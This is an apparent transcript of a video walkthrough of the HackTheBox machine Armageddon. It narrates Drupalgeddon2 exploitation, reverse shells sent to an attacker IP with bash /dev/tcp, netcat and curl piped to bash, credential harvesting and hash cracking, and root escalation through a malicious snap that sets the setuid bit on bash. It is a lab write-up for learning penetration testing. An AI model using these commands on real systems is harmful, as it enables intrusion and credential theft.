What's going on YouTube? This is Ipsec. I'm doing Armageddon from HackTheBox, which is an easy Linux box, so I'm doing this live. I haven't seen it before. However, I record these intros after I do the video, so I know it starts off with finding a Drupal instance. We dig into finding the version of Drupal, looking at some public scripts and also the GitHub repo and just finding out how to do it on our own. And once we find out the version, we know it is vulnerable to DrupalGeddon, which is just a unauthenticated RCE against Drupal. We get a shell on the box, find out that we can run sudo with snap install, dig into it a little bit, and using GTFO bins, we can install a malicious snap, which gives us a root shell. And then at the very end of the video, we'll dig into a little bit about snap and how it differs from apt or APT. So with all that being said, let's jump in. As always, I'm going to start with the nmap. So I'm going to make the directory nmap. And then because I'm impatient, I'm going to do a very quick nmap scan up front. So -p- to do all ports 1 through 65,535. And then -min -rate to set the minimum rate for 10,000 packets per second. And then the IP address of 10.10.10.233. And we can say OA nmap Armageddon all ports. And let this go. I wouldn't recommend doing this often, at least on engagements, because this sends a lot of traffic. And even if just doing it in CTFs, you're sending enough traffic where you may miss ports. So it's not something to rely on. But if you just want a quick view of the box, maybe you're competing for bloods, this is good because it sends it at 10,000 packets per second. So you can see my nmap scan finished in 7.8 seconds. If we wanted to speed that up, we probably could have added a -n flag, because I'm assuming like at least one of those seconds is it's doing host discovery and doing DNS. So if I add this -n flag, we'll see what it's at. Maybe that wasn't it, 7.5 seconds, but still pretty quick. So now that we know there's only SSH and HTTP, we can take a poke at that, but always like having recon go on the background. So -sc for default scripts, sv, enumerate versions, OA, output all formats, nmap, Armageddon, 10.10.10.233. So now with that running, we can go over to Firefox and check out what the page was. We have a just welcome to Armageddon. And oddly enough, this is typoed. They have Armageddon, so maybe that's a Terminator reference. I don't know. But this page, to me, either screams Joomla or Drupal just based upon this user login feel. Looking at it, I think this is Drupal just looking at the URLs. If you didn't know, you can go into the page source and we can see it says Drupal 7. So at this point, we can either run a automated scanner. There's plenty of Drupal scanners. So if we do Drupal scanner on GitHub, on Google, so oh my God, come on, google.com. There we go. Drupal scanner, we can probably find a few. There is Droop, and this was last built June 7th, 2021, so this is probably good. The thing I don't like about this is it's designed, it's named against Drupal, but does multiple CMSs, so I don't know how I feel about that. If I just do Drupal scanner GitHub and look at other ones, like Drupone, CMS thing. My issue with a lot of these like one-off CMS scanners is sometimes they don't stay up to date. Well, this one's 2013, but that's something to always check inside of GitHub. So it looks like a lot of these are actually up to date, so we could just use them. I'm probably going to try out DroopeScan. I haven't ran that before, but if you didn't have a tool, maybe you're doing something that just didn't have a scanner already, what I would generally do is just go to like GitHub. Oh, I'm going to have to go to Google first. And then we can do GitHub, Drupal, and look at the source for this and kind of get an idea how to fingerprint this CMS. So we can see install.txt may exist. So I'm just going to try going to install.txt, and we can see this, and scrolling around, we have instructions, but no way to identify the version. So looking at the other things, .txt, robots.txt, and that. Nothing too interesting there. This is on 9.2, and if we looked at the source, it was on Drupal 7. So I can go over to GitHub and change that to version 7. And we can see changelog.txt, copyright.txt, install MySQL. So changelog.txt is always a good one. And we can look at it, and it looks like it is running Drupal 7.56. I bet if we go and run this tool, it'll also show that. I'm going to do app search. Oh, and nmap tells us it's Drupal 7 as well. Apt, two different typos, different ways. App search, DroopeScan does not have it. So I'm going to go to cd/opt, and let's go install this tool. So git clone, and go into DroopeScan. How do they install it? It's a Python thing. Oh, do I just have it? No module name cement. I'm going to create a virtual environment. So Python 3 VM, and I just do this so when I install this, I don't muck with my system libraries. So source, VM, bin, activate. It's a bit of a pain to use tools when you always use virtual environments, but it's also a pain when you hose your environment because you didn't use this. You have to reinstall the OS. So pick your poison, I guess. Let's see. That did not work. Is there a requirements.txt? There is. Python. Let's do pip3 install requirements. .txt, and we'll install this. And 9 times out of 10, once you install requirements.txt, the application will work. So there we go. We have DroopeScan, and we just do DroopeScan scan Drupal-u. I don't know if I specify HTTP or not. Let's just do U233, and it looks like it is running. I don't know if this version is hard-coded, but maybe we got lucky. It's at 1.33.7. Something tells me that is certainly hard-coded. Does this have versions? I don't even know what versions are. But it takes some time to scan. I guess we can just look at the exact version and look for exploits. So Drupal 7.56. Let's do search exploit on our box. And let's see, we have 7.58 DrupalGeddon 3. It's authenticated, so we may want to do like some type of password spray or things like that. But we do have DrupalGeddon 2 not saying it is authenticated. So let's Google, or not Google, grep DrupalGeddon 2. Did I type that wrong? Let's just copy and paste. Maybe I did. We can do search exploit on DrupalGeddon 2 just to pull these. We have Ruby, Python. I like Python scripts more, so that's the one I'm going to start with. Search exploit -m. And oddly enough, the Ruby one, this one says it's 7.58, but this is saying less than 8. So hopefully this script works. If this doesn't, I'm going to switch over to this Ruby one because it at least says it supports Drupal version 7. So Python 3, a lot of 4s there. URL 10.10.10.233. This is actually specifying HTTP, so we'll do that. It's trying to register. Let's see. The host is saying 233 user. So what I want to probably do, 10.10.10.233/, and it's saying it is not exploitable. We do have the scan finished, and DroopeScan says the possible version 7.56 and nothing else. No real plugins, themes, etc. So I'm going to take a look at the Ruby one, or we could always do Metasploit. Metasploit's generally the best bet. There's a lot of people that don't like using Metasploit. I'm always a fan of using it. Let's see how this works. It looks like it is just Ruby. It's dropping some type of web shell, shell.php. So if I was on an engagement, I may rename this variable because if someone else is poking at the box or I forget to clean up, that's a very bad thing to leave behind. So let's see. I wonder if I just do Ruby. Is that going to execute anything? Does it have how to use it? Got milk. Man, I thought there'd be like a help. Let's see. Function. So Drupal version 7 needs an extra value from a form. So this is probably why the Python one didn't work. Let's just go to Google and see if there's an exploit for it. So if there isn't, then I'm just going to switch to Metasploit. DrupalGeddon 2 POC 7 Python. I'm going to revert that Google change I did. Let's see. Pending, yet to be coded, 758. So it looks like maybe this is not there. And that's the downside of doing these videos live. Typically, I would be able to prep and make sure I know everything to do. So DrupalGeddon 2 target. I think this is the Ruby script I have. So HTTP 10.10.10.233. We probably have to do some type of gems load, like the pip equivalent of Ruby. Let's see, cd opt, git clone. Let's see, require Ruby gems, cannot load such file. Highline, maybe gem install highline. Sudo gem install highline. See if this works. Whoops. There we go. That looks much better. I just saw cannot load file highline, and that's why I thought of that. Let's see. We're sending payload. Looks like we have a hit. So it did it to shell.php. And if I do this, maybe it's going to give me hostname. Oh, I'm in a shell here. So if I do who am I? Apache. So the thing I probably want to do is just get a standard reverse shell. So nc lvnp 9001. We can do bash-c, bash-i, dev tcp 10.10.14.8 9001. See if this sends it. Bad character. Let's see. Reverse shell, cheat sheet. Pentest monkey, and we'll use this NC one. And if this doesn't work, we'll probably either give up and use the shell that the script provides, or we will just use curl and do it without bad payloads. So 10.10.14.8, 9001. Looks fine. Detected bad characters. Make dir dub v index.html, and we'll just do bash-c, bash-i. What was it? Like that. Dev tcp 10.10.14.8 0 and 1. Then python 3-m http server curl 10.10.14.8 index.html bash, and we have to listen. Curl 10.10.14.8. Permission denied. What? I am 10.10.14.8. I wonder if like there's some type of firewall preventing me. Let's see, Python 3 port 80. Let's just try on port 80. Curl 10.10.14.8. That worked. $8,000. Okay, so let's do index.html 10.10.14.8 instead of 9001, let's do port 443. And what did we name this file? I thought I named it index.html. Oh. Not in www there. And we have to listen on 443. And the reason why I switched to 443 and then 9001 is because port 8000 did not work. So that's why I switched to 443, because I assumed if 8000 didn't work, 9001 wouldn't work. So now I have a standard reverse shell. I'm going to do the TTY trick. So Python 3-c import pty spawn bin bash out of weird. Did all this work to get some type of reverse shell, and it looks like it was for nothing. I don't know if I've seen that OS error out of PTY devices. We can certainly Google this and see what this is. Let's see. On Ubuntu, values configurable in this. Did they do something to kill this? I just did that again because I timed out on this one, so I want to make sure my shell was still working. Let's see. grep-v, and then grep this. And what this is doing is counting the file and removing anything that begins with a comment. It doesn't look like I have anything special. Okay, I'm not exactly sure why I can't do that. Do I have Python 3? I assume I do. Yep. Out of PTY devices. Script-q. Let's do script-h. So script-quiet dash command, maybe? No, let's just do script-quiet and devnull. Okay, OpenPTY failed again, so not sure. I guess the last thing we can do is see if we can SSH in. So I'm going to do who am I, look at Apache, and I can grep Apache on etc passwd, and we can see Apache has no login. So if I even SSH in, I can't really execute anything because I don't have a shell. So at this point, I know I compromised a web server, so web servers generally have lots of credentials. You have the MySQL credential, things in the database, like web servers are known for credentials. So that's probably where I look at first before I do any type of enumeration script, because just running like linps or something can get you caught. Poking at things individually probably won't, so that's why I want to go harvest the credentials, see what they are before I do anything. I'm going to cat etc passwd, look at everything here. Annoyingly, I can't use that up. So etc passwd, and I'm going to grep for anything that ends in sh. And there's only two accounts, root and Bruce, the real admin. So I'm going to go to var www, which I guess is my home directory, html, and we want to look for something that has config. This shell.php is obviously me, but find .grep conf. We have misconfigure, web config, and editor config. I think web.config sounds the best. So we cat this file, and we have quite a bit of information. So let's see. Search this for password. And no. Let's see. grep-ri. This is probably going to be bad. Yeah, that's themes. So we got to find out where the Drupal config is. It doesn't look like it's in web.config. Find.grep conf. That's a PNG. So the config's probably going to be some type of .php. The easiest way is probably just to look at index.php, and I don't have a proper shell, so I can't see everything. Maybe grep include on index.php, and it's including bootstrap.inc. Doesn't look promising. Cat includes bootstrap.inc. Maybe it is. Let's see. cd includes cat bootstrap.inc grep-i pass. We got passed through. Again, I was looking for password. We're in this includes directory, so ri password, password.inc, update.inc. Let's see, grep-ri, MySQL is set database. So I am at a loss. What I'm going to do is go to Google and we'll say Drupal change MySQL password. Let's see, sites default settings.php. So sites default cat settings.php, and we should have a password in here. That's proxy. So we got database right here, Drupal user. And man, that is a complex password. vcreds, MySQL, Drupal user, paste that password. Okay. Can I do su, Bruce the real admin, paste that password. System error. Not saying bad password. If I do su on my machine, it'll probably say bad password there, not system error. So that's always reading error messages and figure out what's going on. So that password could have been good. So I'm going to try sh Bruce the real admin at 10.10.10.233. Accept this fingerprint. Paste. And nothing. So let's do MySQL-u Drupal user-p. Put that password in. Let's see, unknown database. So MySQL-u Drupal user. I think it's capital P if you want to put a password in as an argument. I'm just going to do it like this. And do we get in? Show databases. So it looks like I authenticated, but because I don't have this like actual PTY, something went bad. So let's see. Let's do this exploit again. 4449 HTTP 10.10.10.233. Let's see, it's already got that. Can we do it from here? MySQL-u Drupal user-p dash capital P and put it here. Let's see. MySQL specify password CMD line. Really got to fix that about my browser on this machine. So dash dash password equals, I think I saw. Yep. So dash dash password equals this. And since this is a web shell and it's not got a proper TTY, chances are I just can't like get any output or keep running commands. So I'm going to keep using this MySQL command, and we can say like show databases. And maybe this is going to work, maybe it won't. unknown database. Let's see, that doesn't work. We could go back to that config. The database name's probably going to be Drupal. Show tables. Unknown database. Let's see. So we want to get back into this. So we can do, let's see. If I just search for settings.conf, looks like it's out of my pane. So cat var www HTML sites. Let's do ls. Default settings.php. We can, I guess, search for maybe Drupal. Where is that password? Here we go. Database, Drupal. Did I have a capital D or something? Unknown database. Okay. Let's see. MySQL, command line, specify query. And there's probably a much better way to go about doing this. I'm going to single MySQL query. I think it wants me to do, -E maybe? There we go. So I'm going to just try -E, and we can say show databases. And that works as well. So we can see Drupal right there. So show tables, and let's look for user. We got users. So the next command I'm going to do is describe to show me all the columns in this. So describe users. We have UID, name, pass, mail, and login. So select UID, name, pass, login from users. And we got Bruce the real admin and a SQL hash. Or I said SQL because it starts with S, but that's probably like a PHP hash. So I'm going to go over to this pane. We can do hashcat example hashes less and look for $S$. And it looks like it's specific to Drupal. And it's mode 7900. So v hashes, paste that. ls user share word list. Do I have rocku.txt there? I do. Let's just try hashcat real quick. 7900. The word list of user. Wait, it's hash then word list. User share word list. Rocku.txt. Should be good. Unknown CPU generic. Probably doesn't like running off of my VM. So let's get hashcat somewhere else so we can crack this. Or we can probably do John the Ripper. So if I just do John hashes -- word list is equal. And we got the password cracked as boo boo. So we could go inside of Drupal now, log in as this, and probably upload a web shell like we would WordPress. Or we could try SSH as Bruce the real admin at 10.10.10.233. Boo boo. And we get logged in. Awesome. So now we have a shell in the box as Bruce. And if I do sudo -l, we can do user bin snap install. So I always go to GTFO bins. Let's go to Google, GTFO bins, and then type snap. And I think at the time of launch, we couldn't just do this because I don't think snap was on GTFO bins. So, but it is now. I'm going to change the command to bash. It was ID, so it'd only say, hey, you are root. So if I cat test, we got this. Copy. And let's paste. FPM command not found. Do I have FPM here? Apt install FPM. Sudo apt install FPM. Sudo, do I have snap install FPM? Let's see. Let's see what happens when this goes. I may screw up my whole distro. Probably should have done a snapshot before I ran that command, but I like to live dangerously sometimes. So we don't have FPM. What is FPM? Help if I went here. Goal FPM, quick build, okay. Install. Installation guide. Brew, DNF, yum. Gems. So now let's go back, cat test. So I should be able to generate the package. So if you don't know what snap is like a, like apt, yum, etc. Just a different package manager. So we just generated a malicious package. So we can do python 3-m http server. We have to specify port 80, I think. So let's do wget 10.10.14.8, and then the file name, this. Curl -o test.snap, sudo snap install test.snap, and then there were some options that wanted -- dangerous and -- dev mode. So it's running. So it looks like it executed bash, but doesn't give us a prompt back. And that's annoying, but we can work with that. So I'm going to do which bash. We see it's at user bin bash. And let's see. Okay. Now I'm going to go back into cd home, v test, and let's do a chmod 4755 user bin bash. Cat test. Let's create this. Pack v-test. Annoyingly, it changes my directory. Okay, create a package. ls temp. It's somewhere here. I don't know which one it is, so we can do -la. Let's see, 101. There's the same time frames. cat test. I think if I just execute it, it'll put me in the directory. Okay. Python 3-m http server 80 sudo. And let's do another curl on test2.snap. Run this. And let's see if it worked. So if all went well, this should be a setuid binary. I don't like that it's taking a while to run. User bin bash. And the permissions are still the same. So nothing happened there. Install snap change in progress. So let's do a PSEF, grep for snap. So it looks like we have a few things running. I don't know if that screwed things up or not. I guess we can just wait a little bit and see if this eventually gets setuid bit. So it's been a while and there's nothing. So what I'm going to try doing is let's exit here, edit test, and instead of doing something malicious, my general first step is always do something not malicious. I can just touch temp owned, and if we see this file is created by root, then we know something good happened. So let's cat test. We can paste this, and we created the package, that test.snap. Let's do strings on the snap. And we can see bin sh, it's executing temp owned, so that looks good. Let's do a Python, and we can go back to SSH, the curl, and we'll call this please work.snap, sudo snap install, let's call it please work, and so I'm in a different spot, the setting automatic alias for snap. What I'm going to do instead of shing again, I'm going to do Bruce the real admin at 10.10.10.233. And we can type the password of booboo ls temp. And inside of temp, there is no owned. So let's see. Cannot perform run install hook, exit status 1. So I don't see that file owned existing, so don't think that worked, which is unique. I'm going to try one last thing. And that is just creating this package and hosting it. Curl. Call it default. Install. I'm just curious if it's going to say root at the end. Like exactly what was this trying to do? Is it going to error or not? So I'm going to pause the video and let this run. And the ID command worked because we have the output right here. So it says run hook if present, this. So I'm going to do which ID. It's in user bin. If I do which chmod, it's in user bin. So I don't think this is like a path issue, why the chmod didn't work. I'm going to try, maybe it's I can't have spaces in command, command equals ipsec test echo command. That looks fine. vtest. So I'm going to just try to cat root.txt. So let's see if we get the actual flag this way. So cat test. Copy. Python. We can go over here. Curl. And we'll call it flag.snap. And then sudo snap install flag.snap. Oh, we have to do dangerous in developers. And I guess the other thing I can do is not control Z this and just let this hook finish. It just seems to take a while, which maybe that was my mistake and I killed it before this command finished. But I don't think I did that with the touching a file. But I'm going to pause the video. We'll see if this install hook errors and prints out the flag. So it looks like it did. So I think that was my mistake, is just being impatient. So let's go back here, vtest, and let's just do chmod 4755 user bin bash. And then let's make the snap again. So go here. Whoops, wrong copy. Web server, SSH, curl. Call it huzzah because it's how we're going to feel when this works. Sudo snap install huzzah.snap. And I'm going to let this time out and we're going to see if this does it. So lsla user bin bash. If I strings this, user bin bash. So everything looks fine. And we just have to wait for this to error out, which probably happen within the next 10 to 15 seconds. So I really don't know what to say except sorry for wasting your time on this exploit because I was impatient. But yeah. Chmod cannot access user bin bash, no directory. That is actually bizarre. I wonder if it like has a ch root for user bin, and that's why it can't do things. Because I did a cat on /root/flag or root.txt and it worked. But when I specify something in this directory, it does not work. cp user bin bash. Let's see. We can probably just copy it to our home directory. So let's try this. Home, Bruce the real admin. So maybe I didn't waste your time. There's a little bit more to this exploit, I guess. Or not exploit, but this thing. So let's... we don't have to erase that whole thing. We can call this home, Bruce the real admin, bash, and we probably have to ch own it. So ch own root home Bruce the real admin bash. So I probably should do this in two different snap packages, one to ch own, one to do the chmod, but oh well. So let's cat test and run this. Python curl omg.snap. Run this and let's wait the 30 seconds for it to finish. Actually, it's taking a while to mount snap. That's different. Oh, already root. So --p, and my effective UID is 0. So if I go to cd/root, I can cat root.txt. Apologies for the abrupt cut, but I have some extra time before I publish this video, so I wanted to dig into Snap a little bit more to find out exactly what was happening. I did some light Googling and just did like snap vs apt to see what the differences between these packages are. And scrolling down, I think this page has a list. It does. It says dependencies are contained in the package. So my understanding of Snap is it's kind of like a Python virtual environment where the package includes everything you need to run the binary. And then if we take a look at the man page to kind of see what we're doing, we pass 2 flags. The first one was dangerous. And this says it installs a given snap even if there's no pre-acknowledged signature for it, meaning we can just upload unauthorized snaps. Typically, all the snaps go to a store, which gets some type of verification. It's probably not great, just like your app store on a phone. But yeah, so that's why we can install a random snap. The other thing we did was enable dev mode. If we look at dev mode, we have put the snap in development mode and disable security confinement. So what this is essentially doing is allowing us to access system resources. If we don't understand this, we can probably just Google, like, if we go back and say snap, what is dev mode? Let's see, demystifying snap confinement. So I think this will say eventually it enables us to access system resources. So my guess at exactly what was happening is we couldn't edit user bin bash because it packages a bunch of directories and user bin is one of the virtual environment's snap packages. However, temp is not. So that's why when we copied bash over to temp, it just magically worked. So I would definitely take a look at this post to understand what security and confinement is, but that is a TLDR on Snap and what was going on. Hopefully it helps. It could be wrong because, again, not an expert, but that'll be the video. Take care, and I'll see you all next time.